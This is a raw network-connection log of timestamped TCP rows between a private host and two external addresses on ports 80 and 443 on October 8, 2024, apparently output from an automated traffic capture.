Oct 8, 2024 20:47:39.450335026 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:39.450484991 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:39.450573921 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:39.455461979 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:39.575134993 CEST	443	49870	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.581906080 CEST	49870	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.581929922 CEST	443	49870	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.582403898 CEST	49870	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.582413912 CEST	443	49870	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.639292955 CEST	49704	80	192.168.2.5	192.229.211.108
Oct 8, 2024 20:47:39.639389992 CEST	49705	80	192.168.2.5	2.23.198.32
Oct 8, 2024 20:47:39.644999981 CEST	80	49704	192.229.211.108	192.168.2.5
Oct 8, 2024 20:47:39.645056009 CEST	49704	80	192.168.2.5	192.229.211.108
Oct 8, 2024 20:47:39.645093918 CEST	80	49705	2.23.198.32	192.168.2.5
Oct 8, 2024 20:47:39.645143986 CEST	49705	80	192.168.2.5	2.23.198.32
Oct 8, 2024 20:47:39.677371025 CEST	443	49870	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.677834988 CEST	443	49870	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.677887917 CEST	49870	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.677920103 CEST	49870	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.677937031 CEST	443	49870	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.678522110 CEST	443	49871	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.679179907 CEST	49871	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.679231882 CEST	443	49871	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.679605961 CEST	49871	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.679620028 CEST	443	49871	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.680923939 CEST	49876	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.680959940 CEST	443	49876	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.681030989 CEST	49876	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.681159973 CEST	49876	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.681179047 CEST	443	49876	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.709037066 CEST	443	49872	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.709588051 CEST	49872	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.709673882 CEST	443	49872	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.710020065 CEST	49872	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.710033894 CEST	443	49872	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.723869085 CEST	443	49873	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.724231005 CEST	49873	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.724251032 CEST	443	49873	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.724673986 CEST	49873	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.724678040 CEST	443	49873	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.740262985 CEST	443	49874	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.740561008 CEST	49874	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.740570068 CEST	443	49874	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.740931988 CEST	49874	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.740935087 CEST	443	49874	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.783332109 CEST	443	49871	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.783400059 CEST	443	49871	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.783457994 CEST	49871	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.783772945 CEST	49871	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.783811092 CEST	443	49871	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.783838987 CEST	49871	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.783853054 CEST	443	49871	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.794816971 CEST	49877	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.794903994 CEST	443	49877	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.794985056 CEST	49877	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.795156002 CEST	49877	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.795192003 CEST	443	49877	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.807714939 CEST	443	49872	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.807982922 CEST	443	49872	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.808046103 CEST	49872	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.808103085 CEST	49872	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.808123112 CEST	443	49872	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.810569048 CEST	49878	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.810600042 CEST	443	49878	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.810672998 CEST	49878	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.810782909 CEST	49878	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.810810089 CEST	443	49878	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.825547934 CEST	443	49873	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.825630903 CEST	443	49873	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.825678110 CEST	49873	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.825742960 CEST	49873	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.825757027 CEST	443	49873	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.825767040 CEST	49873	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.825771093 CEST	443	49873	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.827975988 CEST	49879	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.828002930 CEST	443	49879	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.828059912 CEST	49879	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.828207970 CEST	49879	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.828222990 CEST	443	49879	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.841308117 CEST	443	49874	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.841583967 CEST	443	49874	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.841634989 CEST	49874	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.841669083 CEST	49874	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.841674089 CEST	443	49874	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.841681957 CEST	49874	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.841686010 CEST	443	49874	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.844028950 CEST	49880	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.844111919 CEST	443	49880	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.844189882 CEST	49880	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.844299078 CEST	49880	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.844333887 CEST	443	49880	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.112802982 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.112845898 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.112885952 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.112889051 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.112921000 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.112934113 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.112934113 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.112957954 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.112967968 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.112989902 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.113010883 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.113028049 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.113040924 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.113078117 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.113102913 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.113136053 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.113152981 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.113169909 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.113188028 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.113224983 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.119744062 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.119796991 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.119803905 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.119848013 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.205617905 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.205652952 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.205688953 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.205703974 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.205703974 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.205722094 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.205733061 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.205758095 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.205775976 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.205807924 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.206001997 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.206058979 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.206059933 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.206088066 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.206110001 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.206132889 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.206350088 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.206403017 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.206403971 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.206435919 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.206456900 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.206482887 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.206490040 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.206523895 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.206568956 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.207298994 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.207331896 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.207357883 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.207376003 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.207401037 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.207448959 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.207453012 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.207484007 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.207503080 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.207583904 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.208189011 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.208242893 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.208242893 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.208276987 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.208293915 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.208328962 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.295000076 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.295037031 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.295066118 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.295105934 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.298506021 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.298562050 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.298574924 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.298609018 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.298629045 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.298645020 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.298666000 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.298677921 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.298705101 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.298717976 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.298752069 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.298773050 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.298806906 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.298815966 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.298881054 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.298887014 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.298937082 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.298994064 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.299046993 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.299046993 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.299079895 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.299097061 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.299112082 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.299129009 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.299145937 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.299156904 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.299180984 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.299196005 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.299236059 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.299899101 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.299958944 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300214052 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300247908 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300276995 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300283909 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300296068 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300318003 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300334930 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300353050 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300371885 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300389051 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300472021 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300503969 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300685883 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300740004 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300812960 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300863028 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300869942 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300901890 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300911903 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300932884 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300954103 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.300966978 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.300987959 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.301000118 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.301021099 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.301053047 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.301676035 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.301728964 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.301733971 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.301763058 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.301791906 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.301837921 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.325201988 CEST	443	49876	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.325730085 CEST	49876	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.325763941 CEST	443	49876	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.326174021 CEST	49876	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.326188087 CEST	443	49876	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.394284964 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394319057 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394350052 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394352913 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394371986 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394388914 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394401073 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394435883 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394512892 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394545078 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394570112 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394578934 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394607067 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394613981 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394629002 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394648075 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394673109 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394681931 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394702911 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394715071 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394748926 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394782066 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394783974 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394818068 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394838095 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394872904 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.394927979 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394963026 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.394987106 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395014048 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395015955 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395046949 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395081997 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395086050 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395102978 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395117998 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395138979 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395174026 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395184994 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395219088 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395251989 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395271063 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395283937 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395291090 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395317078 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395330906 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395351887 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395371914 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395420074 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395457983 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395513058 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395522118 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395555973 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395576000 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395603895 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395673990 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395706892 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395740032 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395761967 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395772934 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395786047 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395821095 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395826101 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395858049 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395880938 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395890951 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395900965 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395924091 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395961046 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.395971060 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.395971060 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396014929 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396028042 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396085024 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396428108 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396480083 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396512032 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396521091 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396541119 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396562099 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396622896 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396655083 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396687984 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396707058 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396722078 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396735907 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396771908 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396827936 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396858931 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396893024 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396918058 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396927118 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396940947 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.396960020 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.396996021 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.397011042 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.397047997 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.397414923 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.397447109 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.397473097 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.397480011 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.397492886 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.397515059 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.397531986 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.397547960 CEST	80	49875	147.45.44.104	192.168.2.5
